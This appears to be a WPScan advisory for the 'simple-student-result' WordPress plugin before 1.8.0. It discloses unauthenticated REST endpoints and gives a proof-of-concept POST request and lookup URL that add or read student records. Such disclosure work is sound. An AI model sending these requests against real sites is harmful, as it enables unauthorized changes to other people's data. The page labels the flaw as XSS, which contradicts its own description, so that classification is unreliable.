Student Result or Employee Database < 1.8.0 – Unauthorised REST Calls | Plugin Vulnerabilities

Description

The plugin has a flawed permission callback in its REST endpoints, allowing unauthenticated attackers to call them and add/edit/delete arbitrary student for example

Proof of Concept

POST /wp-json/v2/ssr_add_data HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 104
Connection: close

rid=Test&roll=&stdname=&fathersname=&pyear=&cgpa=&subject=&dob=&gender=&address=&mnam=&c1=&c2=&image=


http://example.com/wp-json/v2/ssr_find_all?postID=<RID>

Affects Plugins

simple-student-result

Fixed in 1.8.0

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

af2fead6-9f8e-4c00-ac50-440de969ca42

Timeline

Publicly Published

2022-08-01 (about 3 years ago)

Added

2022-08-01 (about 3 years ago)

Last Updated

2022-08-01 (about 3 years ago)

Other

Published

Title

Published

2024-07-15

Title

Pinpoint Booking System < 2.9.9.4.8 - Admin+ Stored XSS

Published

2024-04-05

Title

Bold Page Builder < 4.8.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Widget URL Attribute

Published

2023-11-21

Title

EventPrime – Modern Events Calendar, Bookings and Tickets < 3.3.3 - Contributor+ Stored XSS

Published

2024-02-05

Title

Link Library < 7.6 - Reflected Cross-Site Scripting via 'link_price' and 'link_tags'

Published

2023-12-05

Title

Structured Content < 1.6 - Contributor+ Stored XSS